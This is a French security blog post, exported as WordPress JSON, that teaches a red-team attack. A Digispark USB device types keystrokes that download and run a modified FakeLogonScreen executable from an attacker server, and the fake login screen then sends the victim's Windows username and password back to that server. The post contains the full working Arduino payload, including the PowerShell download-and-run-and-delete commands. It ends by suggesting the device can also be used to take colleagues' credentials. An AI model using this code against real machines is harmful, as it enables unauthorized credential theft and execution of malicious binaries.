{"id":572,"date":"2020-03-20T12:07:34","date_gmt":"2020-03-20T10:07:34","guid":{"rendered":"https:\/\/www.calypt.com\/blog\/?p=572"},"modified":"2020-07-23T13:09:52","modified_gmt":"2020-07-23T11:09:52","slug":"red-team-recuperer-des-identifiants-windows-avec-un-digispark","status":"publish","type":"post","link":"https:\/\/www.calypt.com\/blog\/index.php\/red-team-recuperer-des-identifiants-windows-avec-un-digispark\/","title":{"rendered":"Red-Team : R\u00e9cup\u00e9rer des identifiants Windows avec un Digispark"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" loading=\"lazy\" width=\"1024\" height=\"788\" src=\"https:\/\/www.calypt.com\/blog\/wp-content\/uploads\/2020\/03\/IMG_20200306_165556__01-1-1024x788.jpg\" alt=\"Digispark sur une pi\u00e8ce de 10 centimes\" class=\"wp-image-590\" srcset=\"https:\/\/www.calypt.com\/blog\/wp-content\/uploads\/2020\/03\/IMG_20200306_165556__01-1-1024x788.jpg 1024w, https:\/\/www.calypt.com\/blog\/wp-content\/uploads\/2020\/03\/IMG_20200306_165556__01-1-390x300.jpg 390w, https:\/\/www.calypt.com\/blog\/wp-content\/uploads\/2020\/03\/IMG_20200306_165556__01-1-768x591.jpg 768w, https:\/\/www.calypt.com\/blog\/wp-content\/uploads\/2020\/03\/IMG_20200306_165556__01-1-1536x1182.jpg 1536w, https:\/\/www.calypt.com\/blog\/wp-content\/uploads\/2020\/03\/IMG_20200306_165556__01-1-2048x1576.jpg 2048w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Il n&#8217;est pas rare, lors d&#8217;audits internes et\/ou Red Team, de croiser des sessions laiss\u00e9es n\u00e9gligemment ouvertes. La o\u00f9 le croissantage en bonne et due forme aurait eu lieu au bureau, il est souvent bien plus opportun d&#8217;essayer de r\u00e9cuperer de l&#8217;information strat\u00e9gique, et pourquoi pas des identifiants ?! <\/p>\n\n\n\n<p>Lors d&#8217;un <a href=\"https:\/\/www.calypt.com\/blog\/index.php\/laudit-red-team\/\">audit en Red team<\/a>, l&#8217;utilisation d&#8217;un Rubber Ducky pr\u00e9programm\u00e9 peut faire gagner du temps aux auditeurs, ainsi que rendre certaines attaques plus furtives. Ce dispositif, plut\u00f4t que d&#8217;\u00eatre reconnu par le syst\u00e8me comme une clef USB par exemple, simule un clavier et permet, apr\u00e8s programmation, l&#8217;envoi de frappes clavier pr\u00e9alablement d\u00e9finies sur l&#8217;ordinateur de la victime. Ces ex\u00e9cutions de touches seront ex\u00e9cut\u00e9es bien plus rapidement qu&#8217;un auditeur averti ne pourrait le faire r\u00e9duisant ainsi le temps d&#8217;attaque et la crainte d&#8217;\u00eatre pris sur le fait.<\/p>\n\n\n\n<p>Du simple message texte \u00e0 des ex\u00e9cutions de commandes (Powershell, Bash, etc.) visant \u00e0 lancer un programme malveillant en passant par un <a href=\"https:\/\/www.youtube.com\/watch?v=dQw4w9WgXcQ\">Rickrollage <\/a>de circonstance, seule l&#8217;imagination de l&#8217;auditeur (et la m\u00e9moire du dispositif) limitent les possibilit\u00e9s.<\/p>\n\n\n\n<p>\u00c0 ce jour, un Rubber Ducky co\u00fbte environ 45\u20ac, ce qui n&#8217;est pas particuli\u00e8rement bon march\u00e9. N\u00e9anmoins il existe un concurrent au prix imbattable : le Digispark Attiny85, environ 3\u20ac l&#8217;unit\u00e9.<\/p>\n\n\n\n<p>L&#8217;utilisation est un peu moins triviale que pour le Rubber Ducky, mais permet d&#8217;effectuer, une fois apprivois\u00e9, des attaques similaires \u00e0 moindre co\u00fbt.<\/p>\n\n\n\n<p>Le Digispark a une m\u00e9moire de 6ko, contrairement au Rubber Ducky sur lequel on peut ajouter une micro carte SD. Donc selon vos attaques, vos payloads devront donc \u00eatre t\u00e9l\u00e9charg\u00e9s pendant l&#8217;ex\u00e9cution du Digispark.   <\/p>\n\n\n\n<p>L&#8217;outil <a href=\"https:\/\/github.com\/bitsadmin\/fakelogonscreen\">fakelogonscreen<\/a>  permet de lancer une fausse page de connexion windows sur un  ordinateur, et d&#8217;ensuite r\u00e9cup\u00e9rer le mot de passe. L&#8217;outil open source r\u00e9cup\u00e8re le nom de l&#8217;utilisateur, son mot de passe, ainsi que ses  essais erron\u00e9s, mais avant de d\u00e9crire cette attaque, installons les diff\u00e9rents outils n\u00e9cessaires.<\/p>\n\n\n\n<p><strong>\u00c9tape 1 : Mise en place de l&#8217;environnement<\/strong><\/p>\n\n\n\n<p>Pour plus de d\u00e9tails sur l&#8217;installation : <\/p>\n\n\n\n<p><a href=\"https:\/\/digistump.com\/wiki\/digispark\/tutorials\/connecting\">https:\/\/digistump.com\/wiki\/digispark\/tutorials\/connecting<\/a><\/p>\n\n\n\n<p><a href=\"https:\/\/digistump.com\/wiki\/digispark\/tutorials\/linuxtroubleshooting\">https:\/\/digistump.com\/wiki\/digispark\/tutorials\/linuxtroubleshooting<\/a><\/p>\n\n\n\n<p><strong>Linux<\/strong><\/p>\n\n\n\n<p>Pour Ubuntu : <\/p>\n\n\n\n<p><code>apt install arduino<\/code><\/p>\n\n\n\n<p>D\u00e9pendance n\u00e9cessaire : <a href=\"https:\/\/github.com\/micronucleus\/micronucleus\">https:\/\/github.com\/micronucleus\/micronucleus<\/a><\/p>\n\n\n\n<p><strong>Windows<\/strong> : <\/p>\n\n\n\n<p>Pour Windows, il est n\u00e9cessaire d&#8217;installer Arduino, puis les drivers n\u00e9cessaires :<\/p>\n\n\n\n<p><a href=\"https:\/\/www.arduino.cc\/en\/main\/software\">https:\/\/www.arduino.cc\/en\/main\/software<\/a><\/p>\n\n\n\n<p><a href=\"https:\/\/github.com\/digistump\/DigistumpArduino\/releases\/download\/1.6.7\/Digistump.Drivers.zip\">https:\/\/github.com\/digistump\/DigistumpArduino\/releases\/download\/1.6.7\/Digistump.Drivers.zip<\/a><\/p>\n\n\n\n<p>Apr\u00e8s l&#8217;installation d&#8217;Arduino, il faut ajouter le <em>package<\/em> Digistump suivant \u00e0 l&#8217;application dans la configuration  :<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\"><code>http:\/\/digistump.com\/package_digistump_index.json<\/code>\n\nFile -&gt; Preferences<\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" loading=\"lazy\" width=\"816\" height=\"562\" src=\"https:\/\/www.calypt.com\/blog\/wp-content\/uploads\/2020\/03\/DeepinScreenshot_processing-app-Base_20200307102249.png\" alt=\"Ajout du package Digistump\" class=\"wp-image-586\" srcset=\"https:\/\/www.calypt.com\/blog\/wp-content\/uploads\/2020\/03\/DeepinScreenshot_processing-app-Base_20200307102249.png 816w, https:\/\/www.calypt.com\/blog\/wp-content\/uploads\/2020\/03\/DeepinScreenshot_processing-app-Base_20200307102249-436x300.png 436w, https:\/\/www.calypt.com\/blog\/wp-content\/uploads\/2020\/03\/DeepinScreenshot_processing-app-Base_20200307102249-768x529.png 768w\" sizes=\"(max-width: 816px) 100vw, 816px\" \/><\/figure>\n\n\n\n<p>Choisir ensuite le <em>Board <\/em>Digispark par d\u00e9fault.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" loading=\"lazy\" width=\"957\" height=\"562\" src=\"https:\/\/www.calypt.com\/blog\/wp-content\/uploads\/2020\/03\/DeepinScreenshot_select-area_20200307103101.png\" alt=\"Choix du board manager\" class=\"wp-image-587\" srcset=\"https:\/\/www.calypt.com\/blog\/wp-content\/uploads\/2020\/03\/DeepinScreenshot_select-area_20200307103101.png 957w, https:\/\/www.calypt.com\/blog\/wp-content\/uploads\/2020\/03\/DeepinScreenshot_select-area_20200307103101-511x300.png 511w, https:\/\/www.calypt.com\/blog\/wp-content\/uploads\/2020\/03\/DeepinScreenshot_select-area_20200307103101-768x451.png 768w\" sizes=\"(max-width: 957px) 100vw, 957px\" \/><\/figure>\n\n\n\n<p>Il est possible d\u00e8s \u00e0 pr\u00e9sent d&#8217;envoyer des programmes sur le Digispark ! Le package Board Digispark pr\u00e9c\u00e9demment install\u00e9 propose diff\u00e9rents exemples de programmes.<\/p>\n\n\n\n<p>Par exemple, le programme Keyboard, trivial, affiche en boucle le message &#8220;Hello Digispark&#8221;.<\/p>\n\n\n\n<p><strong><em>File -&gt; Exemples -&gt; DigisparkKeyboard -&gt; Keyboard<\/em><\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"c\" class=\"language-c line-numbers\">#include \"DigiKeyboard.h\"\n\nvoid setup() {\n  \/\/ don't need to set anything up to use DigiKeyboard\n}\n\nvoid loop() {\n  \/\/ this is generally not necessary but with some older systems it seems to\n  \/\/ prevent missing the first character after a delay:\n  DigiKeyboard.sendKeyStroke(0);\n  \n  \/\/ Type out this string letter by letter on the computer (assumes US-style\n  \/\/ keyboard)\n  DigiKeyboard.println(\"Hello Digispark!\");\n  \n  \/\/ It's better to use DigiKeyboard.delay() over the regular Arduino delay()\n  \/\/ if doing keyboard stuff because it keeps talking to the computer to make\n  \/\/ sure the computer knows the keyboard is alive and connected\n  DigiKeyboard.delay(5000);\n}<\/code><\/pre>\n\n\n\n<p>Cliquer sur <em>upload<\/em>, rebrancher votre Digispark, et si tout c&#8217;est bien pass\u00e9, vous allez voir \u00e0 l&#8217;\u00e9cran &#8220;Hello Digispark&#8221; \u00e9crit en boucle !<\/p>\n\n\n\n<p>Attention, on suppose ici que vous utilisez un clavier QWERTY US, le digispark ne supporte pas bien les diff\u00e9rents <em>layout<\/em>. Si votre victime utilise un clavier AZERTY FR par exemple, plusieurs solutions s&#8217;offrent \u00e0 vous :<\/p>\n\n\n\n<ul><li>Convertir vos String de QWERTY US en AZERTY FR, &#8220;powershell&#8221; deviendra &#8220;pozershell&#8221;.<\/li><li>Le script duck2spark permet de sp\u00e9cifier le layout et de convertir des scripts de Rubber Ducky compatible avec le Digispark (https:\/\/github.com\/mame82\/duck2spark)<\/li><\/ul>\n\n\n\n<p><\/p>\n\n\n\n<p>Nous pouvons enfin commencer notre attaque !   <\/p>\n\n\n\n<p><strong>Etape 2 : Modifier FakeLogonScreen pour r\u00e9cup\u00e9rer les identifiants<\/strong><\/p>\n\n\n\n<p>Lorsque la victime va rentrer son mot de passe, l&#8217;outil FakeLogonScreen va l&#8217;enregistrer dans un fichier ou l&#8217;afficher dans le terminal, or nous voulons le r\u00e9cup\u00e9rer. Pour cela, nous avons simplement ajout\u00e9 une requ\u00eate vers notre serveur comprenant le nom de l&#8217;utilisateur ainsi que son mot de passe lorsque la victime essaie de se connecter.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" loading=\"lazy\" width=\"774\" height=\"345\" src=\"https:\/\/www.calypt.com\/blog\/wp-content\/uploads\/2020\/03\/DeepinScreenshot_select-area_20200310083719-2.png\" alt=\"\" class=\"wp-image-608\" srcset=\"https:\/\/www.calypt.com\/blog\/wp-content\/uploads\/2020\/03\/DeepinScreenshot_select-area_20200310083719-2.png 774w, https:\/\/www.calypt.com\/blog\/wp-content\/uploads\/2020\/03\/DeepinScreenshot_select-area_20200310083719-2-600x267.png 600w, https:\/\/www.calypt.com\/blog\/wp-content\/uploads\/2020\/03\/DeepinScreenshot_select-area_20200310083719-2-768x342.png 768w\" sizes=\"(max-width: 774px) 100vw, 774px\" \/><\/figure>\n\n\n\n<p>Compiler et placer l&#8217;executable sur votre serveur, pour qu&#8217;il puisse ensuite \u00eatre t\u00e9l\u00e9charg\u00e9 sur l&#8217;ordinateur de la victime. Ensuite, lancer un serveur HTTP pour r\u00e9cup\u00e9rer les identifiants dans les logs !<\/p>\n\n\n\n<p><\/p>\n\n\n\n<p><strong>Etape 3 : Cr\u00e9ation de l&#8217;attaque<\/strong><\/p>\n\n\n\n<p>Le programme de notre attaque va t\u00e9l\u00e9charger notre application via le <em>powershell<\/em>, lancer via la recherche de programe de Windows. Apr\u00e8s le lancement de l&#8217;ex\u00e9cutable, si jamais il n&#8217;a pas \u00e9t\u00e9 rep\u00e9r\u00e9 par l&#8217;antivirus de votre OS, la commande va attendre que la victime entre son mot de passe, pour supprimer le fichier du binaire et fermer le terminal.<\/p>\n\n\n\n<p>Des d\u00e9lais plus ou moins longs sont n\u00e9cessaires, en effet le Digispark ne peut pas savoir si une commande a fini son ex\u00e9cution, il  faut donc mettre des d\u00e9lais plus long pour que vos attaques fonctionnent aussi sur des ordinateurs lents. \u00c0 vous de trouver le juste milieu pour que votre attaque ne prenne pas trop de temps ! <\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"c\" class=\"language-c line-numbers\">#include \"DigiKeyboard.h\"\n\nvoid setup() {\n  DigiKeyboard.sendKeyStroke(0);\n  DigiKeyboard.delay(1000);\n  \/\/ Lance la recherche de programme (touche Windows + R)\n  DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);\n  DigiKeyboard.delay(100);\n  \/\/ Ouvre le terminal\n  DigiKeyboard.println(\"powershell\");\n  DigiKeyboard.delay(100);\n  DigiKeyboard.sendKeyStroke(KEY_ENTER);\n  DigiKeyboard.delay(500);\n  \/\/ T\u00e9l\u00e9charge le binaire de FakeLogonScreen pr\u00e9sent sur notre serveur\n  DigiKeyboard.println(\"wget http:\/\/192.168.0.106\/application.exe -OutFile .\/application.exe\");\n  DigiKeyboard.delay(500);\n  DigiKeyboard.sendKeyStroke(KEY_ENTER); \n  DigiKeyboard.delay(100);\n  \/\/ Lance le programme, puis attends la fin du processus pour supprimer le fichier ainsi que quitter le terminal\n  DigiKeyboard.println(\"Start-Process application.exe -wait; rm application.exe; exit\");\n  digitalWrite(1, HIGH);\n  }\n\n\/* Unused endless loop *\/\nvoid loop() {}<\/code><\/pre>\n\n\n\n<p>Apr\u00e8s avoir modifi\u00e9 l&#8217;URL du serveur pour sp\u00e9cifier le v\u00f4tre, uploader le programme sur le Digispark. Brancher votre Digispark sur un Windows 10 et vous devriez voir l&#8217;attaque se d\u00e9rouler devant vos yeux !<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" loading=\"lazy\" width=\"766\" height=\"588\" src=\"https:\/\/www.calypt.com\/blog\/wp-content\/uploads\/2020\/03\/login-1.png\" alt=\"Fausse page de connexion \" class=\"wp-image-577\" srcset=\"https:\/\/www.calypt.com\/blog\/wp-content\/uploads\/2020\/03\/login-1.png 766w, https:\/\/www.calypt.com\/blog\/wp-content\/uploads\/2020\/03\/login-1-391x300.png 391w\" sizes=\"(max-width: 766px) 100vw, 766px\" \/><\/figure>\n\n\n\n<p>On r\u00e9cup\u00e8re sur notre serveur le nom et le mot de passe de l&#8217;utilisateur, ainsi que ses diff\u00e9rents essais erron\u00e9s ! <\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" loading=\"lazy\" width=\"783\" height=\"134\" src=\"https:\/\/www.calypt.com\/blog\/wp-content\/uploads\/2020\/03\/log.png\" alt=\"Logs du serveur comprenant le nom de l'utilisateur ainsi que son mot de passe\" class=\"wp-image-575\" srcset=\"https:\/\/www.calypt.com\/blog\/wp-content\/uploads\/2020\/03\/log.png 783w, https:\/\/www.calypt.com\/blog\/wp-content\/uploads\/2020\/03\/log-600x103.png 600w, https:\/\/www.calypt.com\/blog\/wp-content\/uploads\/2020\/03\/log-768x131.png 768w\" sizes=\"(max-width: 783px) 100vw, 783px\" \/><\/figure>\n\n\n\n<p>Vous pouvez maintenant utiliser votre Digispark pour subtiliser des identifiants lors d&#8217;audit en Red Team, ou bien ceux de vos coll\u00e8gues, et ainsi les croissanter quand vous voulez ! <\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/i.imgur.com\/qtDX1KU.gif\" alt=\"Attack digispark red team gif\"\/><figcaption>Vid\u00e9o de l&#8217;attaque<\/figcaption><\/figure>\n","protected":false},"excerpt":{"rendered":"<p>Il n&#8217;est pas rare, lors d&#8217;audits internes et\/ou Red Team, de croiser des sessions laiss\u00e9es n\u00e9gligemment ouvertes. La o\u00f9 le croissantage en bonne et due forme aurait eu lieu au bureau, il est souvent bien plus opportun d&#8217;essayer de r\u00e9cuperer de l&#8217;information strat\u00e9gique, et pourquoi pas des identifiants ?! Lors d&#8217;un audit en Red team, [&hellip;]<\/p>\n","protected":false},"author":6,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_mi_skip_tracking":false},"categories":[1],"tags":[78,77,81,60,80,79],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v16.1.1 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<meta name=\"description\" content=\"Le Digispark comme le Rubber Ducky, permet d&#039;effectuer diverses attaques sur des sessions ouvertes lors de vos audits en Red Team, mais \u00e0 moindre co\u00fbt !\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.calypt.com\/blog\/index.php\/red-team-recuperer-des-identifiants-windows-avec-un-digispark\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Red-Team : R\u00e9cup\u00e9rer des identifiants Windows avec un Digispark - Calypt\" \/>\n<meta property=\"og:description\" content=\"Le Digispark comme le Rubber Ducky, permet d&#039;effectuer diverses attaques sur des sessions ouvertes lors de vos audits en Red Team, mais \u00e0 moindre co\u00fbt !\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.calypt.com\/blog\/index.php\/red-team-recuperer-des-identifiants-windows-avec-un-digispark\/\" \/>\n<meta property=\"og:site_name\" content=\"Calypt\" \/>\n<meta property=\"article:published_time\" content=\"2020-03-20T10:07:34+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2020-07-23T11:09:52+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.calypt.com\/blog\/wp-content\/uploads\/2020\/03\/IMG_20200306_165556__01-1-1024x788.jpg\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\">\n\t<meta name=\"twitter:data1\" content=\"6 minutes\">\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.calypt.com\/blog\/#website\",\"url\":\"https:\/\/www.calypt.com\/blog\/\",\"name\":\"Calypt\",\"description\":\"Security thoughts\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":\"https:\/\/www.calypt.com\/blog\/?s={search_term_string}\",\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"en-US\"},{\"@type\":\"ImageObject\",\"@id\":\"https:\/\/www.calypt.com\/blog\/index.php\/red-team-recuperer-des-identifiants-windows-avec-un-digispark\/#primaryimage\",\"inLanguage\":\"en-US\",\"url\":\"https:\/\/www.calypt.com\/blog\/wp-content\/uploads\/2020\/03\/IMG_20200306_165556__01-1-1024x788.jpg\",\"contentUrl\":\"https:\/\/www.calypt.com\/blog\/wp-content\/uploads\/2020\/03\/IMG_20200306_165556__01-1-1024x788.jpg\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.calypt.com\/blog\/index.php\/red-team-recuperer-des-identifiants-windows-avec-un-digispark\/#webpage\",\"url\":\"https:\/\/www.calypt.com\/blog\/index.php\/red-team-recuperer-des-identifiants-windows-avec-un-digispark\/\",\"name\":\"Red-Team : R\\u00e9cup\\u00e9rer des identifiants Windows avec un Digispark - Calypt\",\"isPartOf\":{\"@id\":\"https:\/\/www.calypt.com\/blog\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/www.calypt.com\/blog\/index.php\/red-team-recuperer-des-identifiants-windows-avec-un-digispark\/#primaryimage\"},\"datePublished\":\"2020-03-20T10:07:34+00:00\",\"dateModified\":\"2020-07-23T11:09:52+00:00\",\"author\":{\"@id\":\"https:\/\/www.calypt.com\/blog\/#\/schema\/person\/c0dd22e6afa003adce9b56ce6b121d6d\"},\"description\":\"Le Digispark comme le Rubber Ducky, permet d'effectuer diverses attaques sur des sessions ouvertes lors de vos audits en Red Team, mais \\u00e0 moindre co\\u00fbt !\",\"breadcrumb\":{\"@id\":\"https:\/\/www.calypt.com\/blog\/index.php\/red-team-recuperer-des-identifiants-windows-avec-un-digispark\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.calypt.com\/blog\/index.php\/red-team-recuperer-des-identifiants-windows-avec-un-digispark\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.calypt.com\/blog\/index.php\/red-team-recuperer-des-identifiants-windows-avec-un-digispark\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"item\":{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.calypt.com\/blog\/\",\"url\":\"https:\/\/www.calypt.com\/blog\/\",\"name\":\"Home\"}},{\"@type\":\"ListItem\",\"position\":2,\"item\":{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.calypt.com\/blog\/index.php\/red-team-recuperer-des-identifiants-windows-avec-un-digispark\/\",\"url\":\"https:\/\/www.calypt.com\/blog\/index.php\/red-team-recuperer-des-identifiants-windows-avec-un-digispark\/\",\"name\":\"Red-Team : R\\u00e9cup\\u00e9rer des identifiants Windows avec un Digispark\"}}]},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.calypt.com\/blog\/#\/schema\/person\/c0dd22e6afa003adce9b56ce6b121d6d\",\"name\":\"Kim-Son PHAM\",\"image\":{\"@type\":\"ImageObject\",\"@id\":\"https:\/\/www.calypt.com\/blog\/#personlogo\",\"inLanguage\":\"en-US\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/a643ea63a7610b83f1727750838269a0?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/a643ea63a7610b83f1727750838269a0?s=96&d=mm&r=g\",\"caption\":\"Kim-Son PHAM\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","_links":{"self":[{"href":"https:\/\/www.calypt.com\/blog\/index.php\/wp-json\/wp\/v2\/posts\/572"}],"collection":[{"href":"https:\/\/www.calypt.com\/blog\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.calypt.com\/blog\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.calypt.com\/blog\/index.php\/wp-json\/wp\/v2\/users\/6"}],"replies":[{"embeddable":true,"href":"https:\/\/www.calypt.com\/blog\/index.php\/wp-json\/wp\/v2\/comments?post=572"}],"version-history":[{"count":45,"href":"https:\/\/www.calypt.com\/blog\/index.php\/wp-json\/wp\/v2\/posts\/572\/revisions"}],"predecessor-version":[{"id":658,"href":"https:\/\/www.calypt.com\/blog\/index.php\/wp-json\/wp\/v2\/posts\/572\/revisions\/658"}],"wp:attachment":[{"href":"https:\/\/www.calypt.com\/blog\/index.php\/wp-json\/wp\/v2\/media?parent=572"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.calypt.com\/blog\/index.php\/wp-json\/wp\/v2\/categories?post=572"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.calypt.com\/blog\/index.php\/wp-json\/wp\/v2\/tags?post=572"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}